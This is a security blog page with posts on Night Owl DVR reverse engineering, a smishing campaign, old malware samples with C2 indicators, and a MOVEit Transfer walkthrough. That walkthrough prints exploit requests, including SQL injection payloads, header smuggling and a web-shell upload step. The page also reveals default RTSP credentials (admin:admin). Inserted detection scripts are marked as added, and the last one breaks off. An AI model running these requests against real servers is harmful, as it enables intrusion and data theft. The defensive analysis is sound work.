Category: Uncategorized

  • Analyzing Night Owl Protect CMS Application Logs + Ghidra

    Analyzing the network traffic pcap led me to see that this “American” company is using a foreign (Taiwanese) P2P network and authentication infrastructure for viewing Night Owl streams via their CMS app. I don’t like it. However, the network traffic didn’t tell me why I can’t view live/recorded video playback in the Windows application. So, this requires a deep dive into the application logs. I also want to understand how the executable works and want to learn how to use Ghidra and reverse engineer more in depth.

    Application Logs

    I copied the program’s parent directory over to my Linux machine for analysis, navigated to ..\OprLog and found the app log files. During inspection of an entire log file, I found no errors regarding video playback. But, interestingly enough, Night Owl stores credentials in plaintext!!!

    It’s 2024, people. Can we not store creds in plaintext, please??

    But, alas, since I still did not find any ERROR messages regarding playback, it is time to dig into reverse engineering the firmware.

    Ghidra

    My DVR version is DVR-FTD4-8. I downloaded the firmware file from here: https://support.nightowlsp.com/hc/en-us/articles/13090197774747-FTD4-Series

    Next, I attempted to import the firmware bin into Ghidra, but found that I did not know the architecture. I could make an educated guess, but really had no idea what DVR systems use for processors.

    So, I attempted to attach a keyboard to the device, reboot the DVR, and spam any and all keys that might drop into the bootloader, in order to find the specific processor architecture. But no such luck.

    I ended up pulling the plug on the DVR and opening up the case.

    Unfortunately, the processor is covered with the heat sink. Next best thing is to look up the board schematics to see if there are correlating FCC documents showing specific processors. Motherboard is AHB8008T-NB-T36-OWL v1.02.

    I found an FCC document for the bluetooth chip radiation evaluation. However, this does not provide any schematics or information on the processor.

    There is no information on this specific OWL-branded board, so I searched for AHB8008T alone and found that various security camera DVRs use this parent board. This led me to a CVE referencing this board and its manufacturer, Xiongmai.

    I searched for Xiongmai plus the board name and found that it uses a Hisilicon Hi3531D:

    The above documentation explains that this processor uses an ARM Cortex-A9 at 1.4 GHz. I imported it as ARM Cortex (little endian).

    Conclusion of Part One

    I now have the firmware loaded into Ghidra. I also already have the exe and all dlls ready for import. Does the firmware contain any helpful information for me to find out why I’m experiencing the black video playback? Probably not. But I want experience in reverse engineering firmware.

    Most likely the video playback error will be found in a dll and referenced in the exe. But I am also interested in finding security vulnerabilities in this product (such as the plaintext credentials) since I use this to help secure my home. And I’m also interested in finding how much of what is being sent to foreign companies and governments (and possible adversaries). Then I want to find these devices on shodan to see if I can exploit their p2p protocol.

  • Analyzing Night Owl Protect CMS PCAP

    Home security camera systems that offer ONLY an offline DVR and wired cameras on a LAN — with the capability to port forward video streams to a mobile app — are non-existent. Every single “security” company offering “security” cameras requires connecting to the company’s cloud servers — even if the product is wired to your LAN with offline DVR storage. I hate it. But I had to get something, so I picked up Night Owl Protect from Costco back in Summer 2023.

    The iOS app is fine. The MacOS app is fine. I hate how it has no web browser app (hate it). But the Windows app, which I presumed would work better than Apple, doesn’t work. Below are the relevant details:

    • Issue: Video playback boxes for both live and recorded video are black frames
    • OS Version: Windows 11 Pro 24H2 26100.2605
    • CMS Version: 1.0.22.T.20230912
    • Night Owl Protect Model: DVR-FTD4-8_1.2.4

    Analysis

    Wireshark PCAP

    A DNS query is made to ota.no-protect.com. VirusTotal shows that this is a domain associated with Night Owl, used to manage devices and your account via the browser; however, there is no way to view video through it. This DNS request resolves to .kota.kalayservice.com. This refers to the Kalay Developer Console (KDC), “which is a tool from TUTK that provides smart device development tools, records, and documentation.” Kalay is developed by TUTK (ThroughTek Co) as a platform for IoT devices and cloud video management.

    During the authentication phase, the application calls out to all-c-master-NightOwl.iotcplatform.com. It is owned by ThroughTek and used for the remote access of AV streams. It is used for “punching” through NAT via the iotcplatform library in order to make it “user friendly” (hate it).

    iotcplatform, Kalay, and ThroughTek are all part of the same Taiwanese (probably Chinese) company umbrella, ThroughTek Co, Ltd. IOTCPlatform is the networking infrastructure; Kalay is the P2P software infrastructure.
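
    To turn the observation above into something repeatable, here is an added Python example (not from the post) that parses a simple DNS query log, follows CNAME answers, and reports which first-party hostnames end up resolving into ThroughTek’s kalayservice.com or iotcplatform.com infrastructure. The log line format and the sample lines are constructed; the ota-edge CNAME target is a placeholder name, and only the two suffixes come from the capture discussed here.

```python
import re

# Third-party P2P/cloud infrastructure suffixes identified in the capture
# (ThroughTek's Kalay and IOTC platforms).
TUTK_SUFFIXES = ("kalayservice.com", "iotcplatform.com")

# Constructed sample DNS log (not real capture data). One query per line:
# "<time> <client> <qname> -> <answer>", where the answer is either a CNAME
# target hostname or an IPv4 address. The ota.no-protect.com CNAME into
# kota.kalayservice.com mirrors the behaviour described in the post; the
# "ota-edge" host label is a placeholder.
SAMPLE_DNS_LOG = """\
12:00:01.101 192.168.1.50 ota.no-protect.com -> ota-edge.kota.kalayservice.com
12:00:01.102 192.168.1.50 ota-edge.kota.kalayservice.com -> 203.0.113.10
12:00:02.450 192.168.1.50 all-c-master-NightOwl.iotcplatform.com -> 203.0.113.20
12:00:05.000 192.168.1.50 www.example.org -> 198.51.100.7
"""

LINE_RE = re.compile(r"^\S+\s+(\S+)\s+(\S+)\s+->\s+(\S+)$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_dns_lines(text):
    """Parse log lines into (client, qname, answer) tuples, names lowercased."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            client, qname, answer = m.groups()
            records.append((client, qname.lower(), answer.lower()))
    return records


def matches_suffix(name, suffixes):
    return any(name == s or name.endswith("." + s) for s in suffixes)


def resolve_chain(qname, cname_map, limit=10):
    """Follow CNAME answers from qname; returns every name visited."""
    chain, seen = [qname], {qname}
    while qname in cname_map and len(chain) <= limit:
        qname = cname_map[qname]
        if qname in seen:
            break
        chain.append(qname)
        seen.add(qname)
    return chain


def find_third_party_p2p(records, suffixes=TUTK_SUFFIXES):
    """Return (client, queried_name, matched_name) for each original query that
    lands on a third-party P2P suffix, directly or via its CNAME chain.
    Names that only appear as CNAME targets are intermediate lookups and are
    skipped so each vendor hostname is reported once."""
    cname_map = {q: a for _, q, a in records if not IPV4_RE.match(a)}
    intermediate = set(cname_map.values())
    findings = []
    for client, qname, _ in records:
        if qname in intermediate:
            continue
        for name in resolve_chain(qname, cname_map):
            if matches_suffix(name, suffixes):
                findings.append((client, qname, name))
                break
    return findings


if __name__ == "__main__":
    for client, queried, matched in find_third_party_p2p(parse_dns_lines(SAMPLE_DNS_LOG)):
        print(f"{client} queried {queried} -> resolves into {matched}")
```

    Feeding it Zeek dns.log or pihole query output only requires swapping LINE_RE; the suffix list is the part worth maintaining, since a vendor can change its first-party hostnames without changing the P2P provider behind them.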

    Funny side note: Night Owl SP, LLC was sold in 2020 to SFP Holding, Inc. Then in 2021, BlackRock acquired a majority interest in Summit.

    I’m pretty sure I found a useful RTSP error packet, namely an invalid sample rate of 90000 for the H265 codec.

    I think the application is having a hard time running the h.265 codec, namely because there’s another RTP packet seemingly trying to enforce h.264. (Also, don’t mind the user and password in the RTSP URI. It’s only for that local client with a specific token. It’s not for the actual stream.)

    I was able to test the RTSP stream in VLC on my Linux desktop. Turns out Night Owl uses the default RTSP credentials of admin:admin. If the streamer has multiple cameras, make sure to specify channel=. You can also specify whether you want video and/or audio by using stream=1 or 0 and audio=1 or 0.

    Anyway, I did check the specs on my Windows machine, and the CPU is an Intel Celeron N5095. According to Intel, it does support HEVC/H.265 via its Quick Sync Video capability. Though, some have had mixed luck with the codec.

    Initial Conclusion

    I’m with you @Flintsone61. I feel ya.

    Could be H.265/HEVC related since it was working on my Windows machine, but now it’s not. Unsure. I’ll be taking a look at the application logs in part two. I did find they store credentials in plaintext, which is fun…

  • Analyzing a Smishing Attempt

    Most days I ignore, delete, and/or block phishing emails or smishing messages. However, let’s dig into one to see what we can find.

    Phone Number

    A quick Google search shows that +63 is a Philippines country code. Hopefully this is an immediate signal that it is a phishing attempt.

    No results for the full phone number show up anymore. Honestly, it’s probably a throw-away number.

    URL Analysis

    I put the URL into URLScan: https://urlscan.io/result/e478ca5f-d6f8-424b-b25f-afab8cc38236/

    Results show no redirections; it goes straight to a landing page for the ezdrivema[.]com-siiiic[.]top domain.

    We can see the page is a clone of the Massachusetts Department of Transportation’s EZPass program: https://www.mass.gov/ezdrivema. Funny enough, their website is warning about this smishing attack:

    The URLScan result shows a POST to /ezpassmalogin that is tied to the whole page and fires whenever the user clicks the button. However, all other links on the page lead to the legitimate MA DOT page. I’m not sure what all the JavaScript is doing, but it looks like it could be a “man in the middle” type scenario.

    I also tried to access the URL via AnyRun, but it could not reach it.

    VirusTotal results are below:

    0/94, https://www.virustotal.com/gui/domain/ezdrivema.com-xiiiic.top

    5/96, https://www.virustotal.com/gui/url/28782f6b4692ca68adc1cc37ca2182ddcc10ad48fb3237aed1494b951bd1094b

    Looks like even VirusTotal returns a 404 error. I think the URLScan results are cached from when a different user scanned it before the attacker took down the domain.

    The domain was served by 47.89.248[.]140. This is a domestically geolocated IP address owned by Alibaba cloud services. nslookup shows that the IP also serves the following domains:

    ezdrivema[.]com-xiiiic[.]top
    ezdrivema[.]com-xiiiir[.]top
    ezdrivema[.]com-xiiiij[.]top
    ezdrivema[.]com-heeeq[.]top
    ezdrivema[.]com-xiiiif[.]top
    ezdrivema[.]com-xiiiia[.]top
    ezdrivema[.]com-heeet[.]top
    ezdrivema[.]com-xiiiin[.]top
    ezdrivema[.]com-heeec[.]top
    ezdrivema[.]com-xiiiiq[.]top
    ezdrivema[.]com-xiiiik[.]top
    ezdrivema[.]com-xiiiib[.]top
    ezdrivema[.]com-heeez[.]top
    ezdrivema[.]com-heeef[.]top
    ezdrivema[.]com-youshz[.]top
    ezdrivema[.]com-gdsgdff[.]top
    ezdrivema[.]com-youshc[.]top
    ezdrivema[.]com-guonix[.]top
    ezdrivema[.]com-youshs[.]top
    ezdrivema[.]com-gdsgdfa[.]top
    ezdrivema[.]com-gdsgdfd[.]top
    ezdrivema[.]com-guonib[.]top
    ezdrivema[.]com-youshe[.]top
    ezdrivema[.]com-gdsgdfz[.]top
    ezdrivema[.]com-guonia[.]top
    ezdrivema[.]com-guonis[.]top
    ezdrivema[.]com-gdsgdfr[.]top
    ezdrivema[.]com-youshq[.]top
    ezdrivema[.]com-guonif[.]top
    ezdrivema[.]com-guonit[.]top
    ezdrivema[.]com-gdsgdfq[.]top
    ezdrivema[.]com-gdsgdfe[.]top
    ezdrivema[.]com-guoniz[.]top
    ezdrivema[.]com-youshx[.]top
    ezdrivema[.]com-guonih[.]top
    ezdrivema[.]com-gdsgdfc[.]top

    Looks like the scammers are varying the parent domain pattern. This IP address also has a history of phishing websites before 2023. However, all of them also seem to return HTTP status 404.
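
    The list above is a single campaign template with a rotating token. As an added example (not part of the original post), the Python below refangs the indicators, flags hostnames that embed the brand string ezdrivema.com while being registered under an unrelated .top domain, and derives a regex from the observed token stems so new rotations of the same template can be matched. The sample list is a constructed subset of the nslookup output above plus two legitimate hosts; the two-label registrable-domain cut is a simplification that a public suffix list would refine.

```python
import re
from collections import Counter

# Brand registrable domains a defender wants to watch. The real EZDriveMA site
# lives under mass.gov; "ezdrivema.com" is the string the smishing domains
# embed as a leading label.
WATCHED_BRANDS = ("ezdrivema.com", "mass.gov")

# Constructed sample: a subset of the defanged domains from the nslookup list
# above plus two legitimate hosts for contrast.
SAMPLE_INDICATORS = [
    "ezdrivema[.]com-xiiiic[.]top",
    "ezdrivema[.]com-xiiiir[.]top",
    "ezdrivema[.]com-heeeq[.]top",
    "ezdrivema[.]com-youshz[.]top",
    "ezdrivema[.]com-gdsgdff[.]top",
    "ezdrivema[.]com-guonix[.]top",
    "ezdrivema[.]com-guonib[.]top",
    "www.mass.gov",     # legitimate EZDriveMA host
    "ezdrivema.com",    # the brand's own registrable domain
]


def refang(indicator):
    """Turn a defanged indicator back into a hostname."""
    return indicator.strip().lower().replace("[.]", ".")


def registrable_domain(host):
    """Last two labels. Simplified: a public-suffix list would handle
    multi-label suffixes such as co.uk; enough for .top and .gov here."""
    return ".".join(host.split(".")[-2:])


def classify_lookalike(host):
    """Return (brand, actual_registrable_domain) when a watched brand string
    appears in the hostname but the registrable domain belongs to someone else,
    otherwise None."""
    host = refang(host)
    reg = registrable_domain(host)
    if reg in WATCHED_BRANDS:
        return None
    for brand in WATCHED_BRANDS:
        if brand in host:
            return (brand, reg)
    return None


def find_lookalikes(indicators):
    return [(refang(h), *res) for h in indicators if (res := classify_lookalike(h))]


def token_stems(indicators):
    """Group the attacker-chosen label after 'com-' by its stem (the label minus
    its final character), e.g. 'xiiiic' -> 'xiiii'. Returns a Counter."""
    stems = Counter()
    for h in indicators:
        m = re.fullmatch(r"ezdrivema\.com-([a-z]+)\.top", refang(h))
        if m:
            stems[m.group(1)[:-1]] += 1
    return stems


def build_fingerprint(stems):
    """Compile a regex that matches any future domain built from the observed
    stems with a different trailing character."""
    alternation = "|".join(re.escape(s) for s in sorted(stems))
    return re.compile(rf"^ezdrivema\.com-(?:{alternation})[a-z]\.top$")


if __name__ == "__main__":
    for host, brand, reg in find_lookalikes(SAMPLE_INDICATORS):
        print(f"lookalike: {host} (brand {brand}, actually registered under {reg})")
    stems = token_stems(SAMPLE_INDICATORS)
    print("stems:", dict(stems))
    print("pattern:", build_fingerprint(stems).pattern)
```

    The stem grouping is what makes the fingerprint useful: the scammer only rotates the last character of each token, so a pattern built from the stems catches the next registration while the exact-match blocklist does not.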

    Conclusion

    I have a virtual sms number to be used for testing smishing attackers, but I’m not ready to pay for international texts.

    And the attacker has already taken all the domains down.

  • Welltok MOVEit Transfer Simulated Walkthrough

    Another classic example of a third-party breach ruining it for the rest of us.

    On 22 December 2023, the Denver-based wellness company Welltok sent a letter to the Attorney General of Connecticut, informing him of 847,356 CT residents’ compromised health data.

    The letter describes that the actual compromise occurred in May 2023, when a Threat Actor (TA) used the then-unknown MOVEit zero-day vulnerability to exfiltrate customer data from the file server. Sadly, there was nothing Welltok could have done to mitigate an unknown zero-day. Although, Welltok’s SOC or CyberInfra team (whatever it may be) could have had specific alerts for anomalous exfiltration of sensitive data (i.e., customer PHI) from important file servers and for modification of accounts to sysadmin-level privileges.

    Below is how it would’ve gone down.

    Reconnaissance (TA0043)

    The TA scans public-facing servers with various fingerprints (T1595.003) — whether manually (e.g., a curl -v -I command), with a homemade scanner bot, or with a premium service (i.e., Censys, Shodan, etc.). Possible fingerprints could be:

    • /human.aspx indicates Progress MOVEit Transfer login form
    • Header including Server: Progress MOVEit
    • Possible HTML title tag including MOVEit Transfer

    Initial Access (TA0001)

    Exploit Public Facing Application (T1190)

    The TA sends an HTTPS GET request to populate the ASP.NET_SessionId cookie in order to start a session with the server:

    $ curl -I https://moveit.example.com
    ...
    set-cookie: ASP.NET_SessionId=yxg0zv4pkpkqoobio0uoe2zf;
    ...

    Next, the TA uses a vulnerability in MOVEitISAPI.dll to set session variables for the session:

    curl -H "xx-silock-transaction: folder_add_by_path" -H "X-siLock-Transaction: session_setvars" -I https://moveit.example.com/moveitisapi.dll?action=m2

    To explain, m2 is an action parameter in the compiled DLL. When it is called, it allows the folder_add_by_path value to be set in the X-siLock-Transaction header. However, when this header is present (X-siLock-Transaction: folder_add_by_path), ISAPI (Internet Server API) [which filters calls to the Microsoft IIS web server’s ASP.NET application] reads the header field case-insensitively and as a substring of a larger name, whereas .NET requires it to be case-sensitive. This means the ISAPI layer can pass multiple x-silock-transaction header values, with the second header being the only one read by the .NET server.

    MOVEit accepts X-SILOCK-* headers, and the aforementioned DLL accepts custom headers, which is what the session_setvars transaction allows. For example:

    POST /MOVEitISAPI/MOVEitISAPI.dll?action=m2 HTTP/1.1
    Host: 192.168.37.144
    Connection: close
    XX-siLock-Transaction: folder_add_by_path
    X-siLock-Transaction: session_setvars
    X-siLock-SessVar1: MyUsername: Guest
    X-siLock-SessVar2: MyPkgValidationCode: 1
    X-siLock-SessVar3: MyInstMessaging: 1
    X-siLock-SessVar4: MyGuestEmailAddr: x@example.com
    X-siLock-SessVar5: MyPkgID: 0
    X-siLock-SessVar6: MyPkgSelfProvisionedRecips: x' or 1=1) LIMIT 1; -- a
    X-siLock-SessVar7: MyPkgAccessCode: 1'; update users set notes='pwned' where loginname='sysadmin'; -- a
    Cookie: ASP.NET_SessionId=21ts1wiqbftjbjqjbrnjbuxj; siLockLongTermInstID=0
    Content-Length: 0

    In this case, the TA submits a SQL injection using the earlier Guest credentials to create a new sysadmin user with admin-level permissions by targeting the activesessions table.
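
    A defender looking at IIS or WAF logs can catch this request shape without reproducing the exploit. The following is an added Python example (not the post’s or Progress’s code) that models the two lookups described above, a case-insensitive substring match versus an exact match for X-siLock-Transaction, and flags requests where the two disagree, requests carrying client-supplied X-siLock-SessVar* headers on action=m2, and session-variable values containing SQL metacharacters. The requests are constructed from the one shown above (with a benign login-page request for contrast), and the finding labels are this example’s own.

```python
import re

# Constructed sample request, modelled on the session_setvars request shown
# above (same headers and values); only the SessVar lines needed to exercise
# each check are kept.
SUSPICIOUS_REQUEST = """\
POST /MOVEitISAPI/MOVEitISAPI.dll?action=m2 HTTP/1.1
Host: 192.168.37.144
Connection: close
XX-siLock-Transaction: folder_add_by_path
X-siLock-Transaction: session_setvars
X-siLock-SessVar1: MyUsername: Guest
X-siLock-SessVar6: MyPkgSelfProvisionedRecips: x' or 1=1) LIMIT 1; -- a
Cookie: ASP.NET_SessionId=21ts1wiqbftjbjqjbrnjbuxj; siLockLongTermInstID=0
Content-Length: 0
"""

# Constructed benign request to the login page, for contrast.
BENIGN_REQUEST = """\
GET /human.aspx HTTP/1.1
Host: 192.168.37.144
Connection: close
"""

# Quotes, statement separators, comment markers and common SQL keywords.
SQL_META = re.compile(r"'|;|--|\b(?:or|and|union|select|update|insert|drop)\b", re.I)


def parse_request(raw):
    """Split a raw HTTP request into its request line and (name, value) headers."""
    lines = raw.splitlines()
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers


def lenient_lookup(headers, wanted="x-silock-transaction"):
    """Model of the ISAPI behaviour described above: case-insensitive, and the
    wanted name may sit inside a longer header name (XX-siLock-Transaction)."""
    return [v for n, v in headers if wanted in n.lower()]


def strict_lookup(headers, wanted="X-siLock-Transaction"):
    """Model of the .NET side: exact, case-sensitive header name."""
    return [v for n, v in headers if n == wanted]


def inspect_request(raw):
    """Return a list of findings for one request; an empty list means nothing seen."""
    request_line, headers = parse_request(raw)
    findings = []
    lenient, strict = lenient_lookup(headers), strict_lookup(headers)
    if lenient != strict:
        # the two layers would disagree about which transaction is requested
        findings.append(("transaction-header-ambiguity", lenient, strict))
    sessvars = [(n, v) for n, v in headers if n.lower().startswith("x-silock-sessvar")]
    if sessvars and "action=m2" in request_line:
        findings.append(("client-supplied-session-vars", [n for n, _ in sessvars]))
    for n, v in sessvars:
        if SQL_META.search(v):
            findings.append(("sql-metacharacters-in-sessvar", n, v))
    return findings


if __name__ == "__main__":
    for label, raw in (("suspicious", SUSPICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, inspect_request(raw))
```

    The first check is the one worth keeping even after patching: any time a front-end filter and the application behind it resolve the same header differently, a request that makes them disagree is suspicious regardless of which product is involved.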

    Finally, to maintain the session for further access, the TA sends a POST request to retrieve the CSRF token. Ensure Transaction is set to dummy, Arg06 is set to anything, and Arg12 is set to promptaccesscode:

    $ curl -ski 'https://moveit.example.com/guestaccess.aspx?Transaction=dummy&Arg06=accesscode&Arg12=promptaccesscode' | grep csrf
    [...]
    <input type="hidden" name="csrftoken" value="44ad7cfa2e1a73b7a636c0bb0f9ff8d8b8e4239d">
    [...]

    Persistence (TA0003)

    Web Shell (T1505.003)

    Once admin-level permissions are achieved, the TA uploads a reverse web shell into the new sysadmin account’s API directory structure. Ensure uploadType is set to resumable:

    POST https://moveit.example.com/api/v1/folders/{id}/files?uploadType=resumable

    The file will be encrypted in the fileupload database table, but it can be deserialized. Once done, the web shell file is ready to go.

    Conclusion

    The MOVEit Transfer attack was a complex hack that affected a lot of orgs in the Federal government and in the DoD. It was not a trivial happenstance. However, I hope this helped you understand it a bit more.

    For more in-depth analysis of the software and the possible exploitation path, please refer to Assetnote’s and Rapid7’s work:

    https://www.assetnote.io/resources/research/moveit-transfer-rce-part-two-cve-2023-34362

    https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis?referrer=etrblog

  • kombat.exe Analysis

    This is more or less a part three to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

    Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on an SD card.

    Analysis

    Submitted the file to AnyRun. The file performs the following actions (with the respective timestamps):

    +47ms     File drops C:\Users\admin\lzmjqt.exe
    +63ms     lzmjqt.exe writes a new Shell key to the WinLogon registry
    +218ms    Creates process svchost.exe
    +281ms    svchost.exe runs file C:\Users\admin\lzmjqt.exe
    +1313ms   DNS request to slade.safehousenumber[.]com
    +31039ms  murik.portal-protection[.]net[.]ru
    +60758ms  world.rickstudio[.]ru
    +91480ms  banana.cocolands[.]su
    +121s     DNS request to portal.roomshowerbord[.]com
    +150s     DNS request to slade.safehousenumber[.]com
    +271s     DNS request to portal.roomshowerbord[.]com

    The executable drops lzmjqt.exe. This second executable writes a persistent reverse shell to the WinLogon registry. Then the original executable creates an svchost.exe process, which runs the dropped file. The malware then reaches out to its C2 domains — slade.safehousenumber[.]com and portal.roomshowerbord[.]com.

    AnyRun captured a pcap and the DNS output is such:

    The first request, sent to safehousenumber (44.221.84[.]105), received a response containing the following bytes:

    The second request is sent to portal.roomshowerbord[.]com (193.166.255[.]171), and the response received contains the following bytes:

    Reverse engineering the malware with Ghidra gives the following decompilation:

    void entry(void)
    
    {
      undefined4 *puVar1;
      undefined4 extraout_ECX;
      undefined4 extraout_EDX;
      byte *pbVar2;
      char **local_74;
      _startupinfo local_70;
      int local_6c;
      char **local_68;
      int local_64;
      _STARTUPINFOA local_60;
      undefined *local_1c;
      void *pvStack_14;
      undefined *puStack_10;
      undefined *puStack_c;
      undefined4 local_8;
      
      puStack_c = &DAT_0040f058;
      puStack_10 = &DAT_0040e0a8;
      pvStack_14 = ExceptionList;
      local_1c = &stack0xffffff74;
      local_8 = 0;
      ExceptionList = &pvStack_14;
      __set_app_type(2);
      _DAT_00411de8 = 0xffffffff;
      _DAT_0040f030 = 0xffffffff;
      puVar1 = (undefined4 *)__p__fmode();
      *puVar1 = DAT_0040f040;
      puVar1 = (undefined4 *)__p__commode();
      *puVar1 = DAT_0040f020;
      _DAT_00411ddc = *(undefined4 *)_adjust_fdiv_exref;
      FUN_0040e07a();
      if (DAT_00411de4 == 0) {
        __setusermatherr(&DAT_004185c4);
      }
      FUN_0040e07a();
      _initterm(&DAT_0040f03c,&DAT_0040f03c);
      local_70.newmode = DAT_00411dd0;
      __getmainargs(&local_64,&local_74,&local_68,DAT_00411de0,&local_70);
      _initterm(&DAT_0040f03c,&DAT_0040f03c);
      pbVar2 = *(byte **)_acmdln_exref;
      if (*pbVar2 != 0x22) {
        do {
          if (*pbVar2 < 0x21) goto LAB_0040e01b;
          pbVar2 = pbVar2 + 1;
        } while( true );
      }
      do {
        pbVar2 = pbVar2 + 1;
        if (*pbVar2 == 0) break;
      } while (*pbVar2 != 0x22);
      if (*pbVar2 != 0x22) goto LAB_0040e01b;
      do {
        pbVar2 = pbVar2 + 1;
    LAB_0040e01b:
      } while ((*pbVar2 != 0) && (*pbVar2 < 0x21));
      local_60.dwFlags = 0;
      GetStartupInfoA(&local_60);
      GetModuleHandleA((LPCSTR)0x0);
      local_6c = FUN_0040dee8(extraout_ECX,extraout_EDX);
                        /* WARNING: Subroutine does not return */
      exit(local_6c);
    }

    This entry function is the C runtime startup routine that:

    1. Sets up exception handling.
    2. Configures the application type as a console app.
    3. Initializes global variables (e.g., file mode, floating-point settings).
    4. Runs initializers (e.g., C++ constructors) via _initterm.
    5. Retrieves and parses command-line arguments.
    6. Gathers startup information.
    7. Calls the user-defined main function (FUN_0040dee8).
    8. Exits with main’s return value.

    We would need the dropped binary to see what the real malware does.

    OSINT

    Filename: 7zsfx.exe
    VirusTotal Score: 18/43
    MD5: 3aeb8c1edb3810196a3eff1c7a4188b2
    SHA1: f117f6cbdc33cace7ee8026f8eebfc7a04a58a3c
    SHA256: 0477e8fa82354dc04fc44a23a05b069909aa5525f3ea474c2217a5a16a734aa2

    The VirusTotal upload shows the file is not signed but has a product description of “Trend Micro AntiVirus Plus AntiSpyware”. It is categorized as part of the Armadillo malware family.

    slade.safehousenumber[.]com
    9/94, https://www.virustotal.com/gui/domain/slade.safehousenumber.com
    URLScan reaches the domain but produces a blank white page: https://urlscan.io/result/019567f0-6bd6-7669-976e-9da47cfe8b30/

    44.221.84[.]105
    1/94, https://www.virustotal.com/gui/ip-address/44.221.84.105
    The IP is AWS-owned and serves many other domains — both legitimate and malicious.
    URLScan also shows a blank page: https://urlscan.io/result/01956809-0a45-7eed-925f-fe6e637b1665/

    portal.roomshowerbord[.]com
    5/94, https://www.virustotal.com/gui/domain/portal.roomshowerbord.com
    Known malware C2 domain.

    193.166.255[.]171
    2/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
    A large Finnish ISP that provides hundreds of resolutions.
    URLScan shows the IP does not provide a web page: https://urlscan.io/result/01956a2a-e667-7bb8-9f13-23e97f7e4d0f/

    Conclusion

    The malware reaches out to C2 for a second stage, but these are no longer functioning — even though the domains are still alive.

    IOCs

    44.221.84[.]105

    193.166.255[.]171

    portal.roomshowerbord[.]com

    slade.safehousenumber[.]com

    0477e8fa82354dc04fc44a23a05b069909aa5525f3ea474c2217a5a16a734aa2

  • shakira.exe Analysis

    This is more or less a part two to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

    Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on an SD card.

    Analysis

    shakira.exe loads the following dlls in chronological order:

    • +46ms
      • ntdll.dll
      • kernel32.dll
    • +62 ms
      • KernelBase.dll
      • user32.dll
      • gdi32.dll
      • lpk.dll
      • usp10.dll
      • msvcrt.dll
    • +78 ms
      • C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
      • advapi32.dll
      • sechost.dll
      • rpcrt4.dll
      • oleaut32.dll
      • ole32.dll
      • shell32.dll
      • shlwapi.dll
      • imm32.dll
      • msctf.dll
    • +203 ms
      • apphelp.dll
    • +218 ms
      • svchost.exe

    The executable runs the process svchost.exe. That process drops another executable, C:\Users\admin\xuat.exe. Then xuat.exe writes the value explorer.exe,C:\Users\admin\xuat.exe to the Shell entry under the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon. The dropper does this in order to keep persistence across restart and logon. The process then reads various registry entries regarding network connections.

    At +906 ms the process creates a connection to 44.221.84[.]105:33111 (slade.safehousenumber[.]com) and sends 21 bytes of data over UDP:

    At +120 seconds, the xuat.exe process creates a connection to 193.166.255[.]171:33111 (portal.roomshowerbord[.]com) and sends 21 bytes of data over UDP.

    At +128 seconds, the Windows Media Player Network Sharing Service Configuration Application (C:\Program Files\Windows Media Player\wmpnscfg.exe) runs in the background and gathers client information (reads the computer name, checks supported languages, and other sysinfo).

    At +151 seconds, the xuat.exe process creates a connection to 44.221.84[.]105:33111 (slade.safehousenumber[.]com) and sends 21 bytes of data over UDP:

    The malware seems to gather system information and send it to C2 servers.

    Ghidra produced the following decompiled output:

    void entry(void)
    
    {
      undefined4 *puVar1;
      undefined4 extraout_ECX;
      uint extraout_EDX;
      byte *pbVar2;
      char **local_74;
      _startupinfo local_70;
      int local_6c;
      char **local_68;
      int local_64;
      _STARTUPINFOA local_60;
      undefined *local_1c;
      void *pvStack_14;
      undefined *puStack_10;
      undefined *puStack_c;
      undefined4 local_8;
      
      puStack_c = &DAT_00412058;
      puStack_10 = &DAT_0041148c;
      pvStack_14 = ExceptionList;
      local_1c = &stack0xffffff6c;
      local_8 = 0;
      ExceptionList = &pvStack_14;
      __set_app_type(2);
      _DAT_00412038 = 0xffffffff;
      _DAT_00412078 = 0xffffffff;
      puVar1 = (undefined4 *)__p__fmode();
      *puVar1 = DAT_0041214c;
      puVar1 = (undefined4 *)__p__commode();
      *puVar1 = DAT_0041206c;
      _DAT_00412070 = *(undefined4 *)_adjust_fdiv_exref;
      FUN_0041147b();
      if (DAT_0041208c == 0) {
        __setusermatherr(&DAT_00412254);
      }
      FUN_0041147b();
      _initterm(&DAT_00412090,&DAT_00412090);
      local_70.newmode = DAT_00412020;
      __getmainargs(&local_64,&local_74,&local_68,DAT_00412080,&local_70);
      _initterm(&DAT_00412090,&DAT_00412090);
      pbVar2 = *(byte **)_acmdln_exref;
      if (*pbVar2 != 0x22) {
        do {
          if (*pbVar2 < 0x21) goto LAB_0041140f;
          pbVar2 = pbVar2 + 1;
        } while( true );
      }
      do {
        pbVar2 = pbVar2 + 1;
        if (*pbVar2 == 0) break;
      } while (*pbVar2 != 0x22);
      if (*pbVar2 != 0x22) goto LAB_0041140f;
      do {
        pbVar2 = pbVar2 + 1;
    LAB_0041140f:
      } while ((*pbVar2 != 0) && (*pbVar2 < 0x21));
      local_60.dwFlags = 0;
      GetStartupInfoA(&local_60);
      GetModuleHandleA((LPCSTR)0x0);
      local_6c = FUN_004109ec(extraout_ECX,extraout_EDX);
                        /* WARNING: Subroutine does not return */
      exit(local_6c);
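
    To make step 5 of the startup walkthrough concrete, here is a Python reimplementation (added here, not from the post or from Ghidra) of the three command-line loops that appear in both the kombat.exe and shakira.exe entry() listings above. It is the C runtime’s skip-the-program-name logic applied to the raw command line: the comments refer to Ghidra’s pbVar2, and the sample command lines are constructed.

```python
def skip_program_name(cmdline: str) -> str:
    """Reimplementation of the three loops in the entry() listings above.

    pbVar2 walks the raw command line (_acmdln). If the first byte is a double
    quote (0x22), the first loop advances to the matching closing quote; if it
    is not, the loop advances until the first byte below 0x21 (space or control
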